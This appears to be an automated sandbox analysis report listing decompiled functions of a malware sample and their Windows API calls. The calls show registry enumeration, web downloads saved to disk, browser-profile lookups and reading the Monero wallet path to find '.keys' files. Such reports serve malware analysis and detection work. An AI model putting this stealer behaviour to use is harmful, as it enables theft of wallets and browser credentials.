                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                        • String ID: wA$:\$C$QuBi
                                                                                                                                                        • API String ID: 1856320939-1441494722
                                                                                                                                                        • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                        • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                                                                        • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                                                                        • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                                                                        Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                        • wsprintfA.USER32 ref: 004112DD
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                        • API String ID: 1736561257-3278919252
                                                                                                                                                        • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                        • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                                                                        • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                                                                        • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                                                                        Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                        • String ID: <+A
                                                                                                                                                        • API String ID: 2507841554-2778417545
                                                                                                                                                        • Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                        • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                                                                        • Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
                                                                                                                                                        • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                                                                        Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                        • API String ID: 4174444224-1526165396
                                                                                                                                                        • Opcode ID: d95629ca34f4132db4e8a3c88a50794bb5c8e6b36b265fbac58eb73df72782b9
                                                                                                                                                        • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                                                        • Opcode Fuzzy Hash: d95629ca34f4132db4e8a3c88a50794bb5c8e6b36b265fbac58eb73df72782b9
                                                                                                                                                        • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                                                        Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                                                                        • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                        • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                        • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                        • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                        Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                          • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                          • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                          • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                        • String ID: LzA
                                                                                                                                                        • API String ID: 1968765330-1388989900
                                                                                                                                                        • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                        • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                                                        • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                                                        • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                                                        Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                        • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                          • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenProcess_memmove_memset
                                                                                                                                                        • String ID: N0ZWFt
                                                                                                                                                        • API String ID: 2647191932-431618156
                                                                                                                                                        • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                        • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                                                        • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                        • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                                                        Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                        • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                        • String ID: V@
                                                                                                                                                        • API String ID: 2311089104-383300688
                                                                                                                                                        • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                        • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                                                        • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                        • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                                                        Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                          • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                          • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                          • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                          • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
